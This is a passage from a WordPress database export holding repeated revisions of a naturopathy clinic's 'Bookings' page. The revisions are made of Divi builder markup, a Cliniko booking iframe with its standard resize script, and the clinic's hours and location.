locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-06-14 14:38:47','2021-06-14 06:38:47','',48,'https://verdenaturopathy.com.au/?p=322',0,'revision','',0),(255,1,'2021-05-27 21:26:05','2021-05-27 13:26:05','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"169px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\"]<iframe id=\'cliniko-61302514\' src=\'https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-61302514\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-05-27 21:26:05','2021-05-27 13:26:05','',48,'https://verdenaturopathy.com.au/?p=255',0,'revision','',0),(254,1,'2021-05-27 21:24:58','2021-05-27 13:24:58','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"224px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column _builder_version=\"4.9.4\" _module_preset=\"default\" type=\"4_4\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<iframe id=\'cliniko-61302514\' src=\'https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-61302514\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-05-27 21:24:58','2021-05-27 13:24:58','',48,'https://verdenaturopathy.com.au/?p=254',0,'revision','',0),(258,1,'2021-05-27 21:28:16','2021-05-27 13:28:16','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"169px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\"]<iframe id=\'cliniko-61302514\' src=\'https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-61302514\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Bookings','','inherit','closed','closed','','48-revision-v1','','','2021-05-27 21:28:16','2021-05-27 13:28:16','',48,'https://verdenaturopathy.com.au/?p=258',0,'revision','',0),(256,1,'2021-05-27 21:27:34','2021-05-27 13:27:34','<!-- wp:divi/placeholder -->\n[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_enable_color=\"off\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"169px\" custom_margin=\"||60px|||\" custom_padding=\"||0px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22colorStart%22%93}\" colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Make a booking</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" min_height=\"600px\" custom_padding=\"0px|||||\"][et_pb_row _builder_version=\"4.9.4\" background_enable_color=\"off\" min_height=\"665px\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_code _builder_version=\"4.9.4\" _module_preset=\"default\"]<iframe id=\'cliniko-61302514\' src=\'https://verde-health.au2.cliniko.com/bookings?business_id=430041870630918322&practitioner_id=430041868173056552&embedded=true\' frameborder=\'0\' scrolling=\'auto\' width=\'100%\' height=\'1000\' style=\'pointer-events: auto;\'></iframe><!-- [et_pb_line_break_holder] --><script type=\'text/javascript\'><!-- [et_pb_line_break_holder] --> window.addEventListener(\'message\', function handleIFrameMessage (e) {<!-- [et_pb_line_break_holder] --> var clinikoBookings = document.getElementById(\'cliniko-61302514\');<!-- [et_pb_line_break_holder] --> if (typeof e.data !== \'string\') return;<!-- [et_pb_line_break_holder] --> if (e.data.search(\'cliniko-bookings-resize\') > -1) {<!-- [et_pb_line_break_holder] --> var height = Number(e.data.split(\':\')[1]);<!-- [et_pb_line_break_holder] --> clinikoBookings.style.height = height + \'px\';<!-- [et_pb_line_break_holder] --> }<!-- [et_pb_line_break_holder] --> e.data.search(\'cliniko-bookings-page\') > -1 && clinikoBookings.scrollIntoView();<!-- [et_pb_line_break_holder] --> });<!-- [et_pb_line_break_holder] --></script>[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" 